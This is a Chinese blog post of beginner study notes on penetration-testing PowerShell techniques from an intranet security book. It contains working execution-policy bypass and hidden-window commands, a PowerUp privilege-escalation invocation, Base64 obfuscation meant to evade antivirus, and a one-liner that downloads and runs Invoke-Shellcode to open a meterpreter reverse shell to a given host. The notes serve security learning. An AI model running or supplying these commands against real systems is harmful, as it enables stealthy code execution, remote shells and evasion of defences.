《内网安全攻防》学习笔记【1】

最新推荐文章于 2022-04-15 10:38:29 发布
最新推荐文章于 2022-04-15 10:38:29 发布
阅读量2.5k 收藏
点赞数
分类专栏: 内网渗透 学习记录 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lleo1/article/details/121308532
版权

内网安全攻防

0x01 前言

还是回归常态了 有道云笔记用的我不太舒服 用这个记一下笔记吧 ,最近开始学内网渗透方面,但是也没有一个那种系统的学习方法,就先啃着这本书在看看一些大佬的文章来入门。文章随缘写,巩固基础 ,看到哪写到哪,我在思考分开写文章还是合理来就在这篇保持更新

0x02 PowerShell的使用

1.PowerShell的执行策略

为防止恶意脚本的执行,PowerShell有一个执行策略,默认情况下,这个执行策略被设置为受限。

我们可以使用:Get-ExecutionPolicy 命令查看PowerShell当前的执行策略。它有4个策略。

Restricted:脚本不能运行(默认设置)
RemoteSigned:本地创建的脚本可以运行,但是从网上下载的脚本不能运行(拥有数字证书签名的除外)
AllSigned:仅当脚本由受信任的发布者签名时才能运行;
Unrestricted:允许所有的脚本执行
在这里插入图片描述

可用这条cmdlit命令设置PowerShell的执行策略Set-ExecutionPolicy

注:PowerShell命令不区分大小写

2.常用方法

首先,一个PowerShell脚本其实就是一个简单的文本文件,需要在文件名后加上.ps1拓展名
其次想要运行PowerShell脚本,必须用管理员权限将策略从Restricted变成Unresttricted 那么我们在渗透时,就要用一些方法去绕过策略
(1)绕过本地权限并执行

PowerShell.exe -ExecutionPolicy Bypass -File Npce3r.ps1

参数说明:
-ExecutionPolicy Bypass(-Exec Bypass): 绕过执行安全策略,这个参数非常重要,在默认情况下,PowerShell的安全策略规定了PowerShell不允许运行命令和文件。

通过设置这个参数,可以绕过任意一个安全保护规则。在渗透测试中,基本每次运行PowerShell脚本时都要使用这个参数。-----校长

测试一下 好像对目录的要求还挺严格
在这里插入图片描述
写到这里搜了一下 powerup是一个powershell框架 Powerup
这里我看了一下我电脑自带了这个 用Get-Command -Module powerup命令查看有没有
但是我猜可能渗透的时候目标服务器没有 所以都会写上传Powerup.ps1脚本?主要看到各种地方都写了这一步,不知道自己有哪里理解错了,就也写下来吧

通常,在Windows下可以通过内核漏洞来提升权限。但是,我们常常会碰到无法通过内核漏洞提权所处服务器的情况,这个时候就需要利用脆弱的Windows服务提权,或者利用常见的系统服务,通过其继承的系统权限来完成提权等,此框架可以在内核提权行不通的时候,帮助我们寻找服务器的脆弱点,进而同脆弱点实现提权的目的。

然后就可以Import-Moudule加载这个脚本了 下载的路径根据个人情况

powershell.exe -exec bypass -Command "& {Import-Module c:\PowerUp.ps1; Invoke-AllChecks}"

Invoke-AllChecks 函数将检查目标主机的攻击向量以进行权限提升
该模块会自动执行PowerUp下所有的脚本来检查目标主机

(2)从网站服务器下载脚本绕过本地权限并隐藏执行

PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NonInteractive -NoProfile File xx.ps1

参数说明
-WindowStyle Hidden(-w Hidden):隐藏窗口
-NoLogo: 启动不显示版权标志的Powershell
-NoProfile(-Nop): PowerShell控制台不加载当前用户的配置文件
-NonInteractive(-NonI): 非交互模式.PowerShell不为用户提供交互式的提示
-noexit: 执行后不退出Shell(这个参数在使用键盘记录等脚本时非常重要)
顺便书上看不明白的在校长那看明白了

Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -NonI IEX(New-object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1');Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.82.131 -Lport 1234

这段是利用IEX下载远程PS1脚本绕过权限执行 链接处只能用单引号
隔壁文章拓展的我不太看得懂,因为我不会msf 等我会了再说

(3)使用Base64对PowerShell进行编码
使用 Base64 对 Powershell 命令进行编码的目的是混淆和压缩代码, 从而避免脚本因为一些特殊字符被杀毒软件查杀
可以使用python脚本对命令编码 脚本地址ps_encoder.py在使用这个脚本进行文本转换的时候,对象必须为文本文件
在上面命令后面加个> Npce3r.txt即可
然后给ps_encoder.py授予执行权限

chmod +x ps_encoder.py

(默认是用kali的 所以windows当然不行 别问这种奇怪的问题)
编码

./ps_encoder.py -s raw.txt

3.运行32位和64位PowerShell

一些PowerShell脚本只能运行在指定的平台上
在64位的windows系统中存在两个版本的powershell 一个x64一个x86 两个版本的执行策略不会互相影响 x64版本配置文件在%windir%\syswow64\WindowsPowerShell\v1.0\
所以执行的命令如下
32位

powershell.exe -NoP -NonI -W Hidden -Exec Bypass

64位

%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass

暂且休息 搭建内网环境过段时间再说

Npce3r
关注
专栏目录
内网安全攻防:渗透测试实战指南》读书笔记(七):跨域攻击分析及防御
闵行小鱼塘
04-19 2903
本篇继续阅读学习内网安全攻防:渗透测试实战指南》,本章是跨域攻击分析及防御,对利用域信任关系实现跨域攻击的典型方法进行了分析,并对如何部署安全内网生产环境给出了建议,内容非常简短
2021-8-29《内网安全攻防》第一章内网基础知识
qq_45290991的博客
08-30 967
这是MS08067实验室的作品,我看的过程中做了一些笔记,算是复习+学习吧。 第一章、内网基础知识 工作组: 所有计算机对等,没有cs之分。相当于分小组,加入、创建工作组:右键“计算机”--->属性--->更改设置--->在“计算机名”的一栏中写入想好的名称,在“工作组”一栏中写入想要加入的工作组名称。退出工作组:同法改变工作组名称即可。 域:有安全边界的计算机集合。分为: 单域:一个域,一般一个域需要两个dc,因为一个dc坏了还能备份恢复回来 父域 域树,子域只能使用父..
内网安全攻防读书笔记(1)——内网基础知识
qq_40909772的博客
11-12 2424
文章目录1.工作组2.域2.1 单域2.2 父域和子域2.3 域树2.4 域森林2.5 域名服务器3.活动目录4.域控制器和活动目录的区别5.安全域的划分   内网也指局域网,是指在某一区域有多台计算机互连而成的计算机组。可以实现文件管理、应用软件共享、打印机共享、工作组内的日程安排、电子邮件和传真等。 1.工作组   为了方便管理成白上千的计算机组成的局域网,出现了工作组的概念。实现手段就是将不同计算机按照功能或部门分别列入不同的工作组。   加入或者创建工作组的方法是:右击“我的电脑”,选择属性,依次
内网安全攻防:渗透测试实战指南》之内网渗透测试基础
公众号:乌云安全
12-21 2288
本章系统地讲解了内网工作组、域、活动目录、域内权限解读等,并介绍了内网域环境和渗透测试环境(Windows、Linux)的搭建方法和常用的渗透测试工具。
局域网攻防安全
03-09
局域网是指在某一区域内由多台计算机互联成的计算机组,它 可以实现文件管理和共享等功能,一些攻击者常常会采用各种 不同的手段来攻击局域网,可能是炫耀技术,也可能是盗取信 息,无论什么目的,用户都要阻止她们的攻击,确保网络安全
内网安全攻防》配套视频 之 工作组信息收集
Ms08067安全实验室
10-14 232
前言《内网安全攻防 -渗透测试实战指南》出版已有八个月,相信,一定带领很多朋友入门了内网渗透,当然,也有不少读者反馈,看完还是懵懵懂懂,那怎么办?《内网安全攻防》图书出版的同时我们就给...
内网-内网安全攻防-笔记.pdf
09-18
内网安全攻防是网络安全领域的一个重要分支,主要关注的是在企业或组织内部网络中进行安全防护和渗透测试。内网通常指的是公司或机构内部的网络,而非面向公共互联网的开放网络。内网安全攻防涉及到一系列的手段和...
Web安全攻防渗透测试实战指南笔记
Ren59421的博客
04-05 8120
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
Web安全学习笔记.pdf
10-22
Web安全学习笔记》是一份全面介绍Web安全的资料,涵盖了从基础知识到深入技术的多个层面。本笔记首先概述了Web技术的演进历程及其安全挑战的发展,强调了网络安全的重要性。接下来,它深入探讨了计算机网络的基础...
内网安全》构建内网环境
qq_42176207的博客
05-13 287
构建内网环境 学习内网安全攻防》所搭建的环境,后续更新阅读书籍笔记。 Windows Server 2012 R2 :192.168.1.1(DC) Windows Server 2008 R2 :192.168.1.2 Windows 7:192.168.1.3 (仅主机模式) 一、Windows Server 2012 R2服务器 设置服务器IP、子网掩码、DNS 更改计算机名 修改计算机名后需要重新启动计算机才能生效,加入域后计算机全名会自动改变R-DC.hacke.testlab。
如何搭建域环境(来自内网安全攻防
qiuqiunile_的博客
09-04 2357
我们通常说的内网渗透测试,很大程度上就是与渗透测试域渗透测试。搭建域渗透测试环境,在Windows的活动目录环境下进行一系列操作,掌握其运行方法和运行机制,便于对内网安全维护。 在该实验中,我们配置一台windows server 2012 r2服务器,将其升级为域控制器。然后将windows server 2008 r2 加入该域。 将win2012的ip地址设置为: 192.168.1.1 win2008的ip地址设置为: 192.168.1.2 具体的步骤如下: 1、win2012服务器 (1)设置
[内网安全]二.域实验环境搭建
PsgQ的博客
05-10 244
作为网络安全爱好者,对内网的渗透学习必不可少。因此从今天开始从零开始记录自己的内网学习过程,一方面是督促自己不断前行且学习新知识;另一方面是分享与读者,希望大家一起进步。这系列文章入门部分将参考徐焱老师的《内网安全攻防》这本书,并结合作者在安全牛课堂分享的学习讲解视频,且看且珍惜吧!督促自己完成每一个实验,把每一个细节搞懂,加油~ 文章目录0x00虚拟机准备下载地址安装文档0x01域环境搭建Windows 2012 R21.设置IP2.更改计算机名,修改为DC3.安装域控制器和DNS服务4.升级服务器,将服
PTH攻击总结
systemino的博客
05-26 2998
搞过内网渗透的,你肯定听过pth攻击。这种攻击效果非常显著,微软也是因此在存储凭证方面做了很大的改变。但即使是不断的更新,发布补丁,pth攻击还是存在。今天我们就来一探究竟。 目录 ·pth攻击回顾 ·微软更新 ·hash和NTLM介绍 ·Pth攻击原理 ·Zeros取代LM hash ·实际中的配置 ·pth攻击 ·Mimikatz ·SMB pth攻击 · msf scanner/smb/smb_login · Empire lateral_moveme...
PowerUp攻击模块讲解
bring_coco的博客
01-25 1168
PowerUp是Privesc模块下的一个脚本,功能相当强大,拥有众多用来寻找目标主机Windows服务漏洞进行提权的实用脚本 通常,在Windows下可以通过内核漏洞来提升权限,但是,我们常常会碰到无法通过内核漏洞提权所处服务器的情况,这个时候就需要利用脆弱的Windows服务提权,或者利用常见的系统服务,通过其继承的系统权限来完成提权等,此框架可以在内核提权行不通的时候,帮助我们寻找服务器的脆弱点,进而通过脆弱点实现提权的目的。 PowerUp下的模块: 1.Invoke-AllChecks 该模块会自
内网安全 域环境的搭建(模仿真实内网环境 做渗透测试.)
网络安全领域___专研者.
04-15 5334
域的概括: (1)域 ---- 一组服务器和工作站的集合,访问域内机器可免于许可. (2)域控制器 --- 域中用于管理域的一台服务器. (3)域环境 --- 由域控制器管理的环境. 域的作用: (1)域主要是为了方便管理,方便使用网络中的资源,提高网络的集中度和安全度. (2)域主要用于网络规模比较大网络使用量比较大,资源共享度比较大的场合,最为重要的是网络中的资源属于个人私自的不太多的场合.
内网安全攻防:渗透测试实战指南》读书笔记(一):内网渗透测试基础
闵行小鱼塘
04-07 4991
本篇开始阅读学习内网安全攻防:渗透测试实战指南》,做个笔记 本篇是第一章内网渗透测试基础,基本都是些基础概念和环境搭建
内网安全攻防》配套视频 之 域环境搭建
Ms08067安全实验室
09-19 594
内网安全防护始终是企业的一个痛点所在,近年来APT攻击更成为最火的话题之一。因此,只有熟悉内网渗透攻击的方法和步骤,才能有的放矢地做好防御措施,最大程度地保障内网安全。前言《内网安全...
内网安全攻防读书笔记(5)——探测域内存活主机和端口扫描
qq_40909772的博客
01-07 5267
  实际探测可以在白天和晚上分别进行探测。 1.利用NetBIOS快速探测内网   nbtscan工具已经上传到我的资源,大家可以下载。此工具用于扫描本地或远程TCP/IP网络上开放NetBIOS名称服务器。有Windows和Linux两个版本,将其上传到目标服务器就可以直接使用。使用命令如下: nbtscan.exe 192.168.1.0/24 2.利用ICMP协议快速探测内网   依次对内网中每个IP地址执行ping命令,可以快速找出内网中所有存活的主机。在渗透测试中,可以使用如下命令循环探测整个
内网安全攻防学习:从基础知识到工具应用
学习内网安全攻防时,重要的是理解这些工具的功能和应用场景,以及它们如何在实际的攻防过程中发挥作用。掌握这些知识后,不仅可以帮助企业建立更强大的安全防线,也可以帮助安全从业者提升技能,应对日益复杂的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值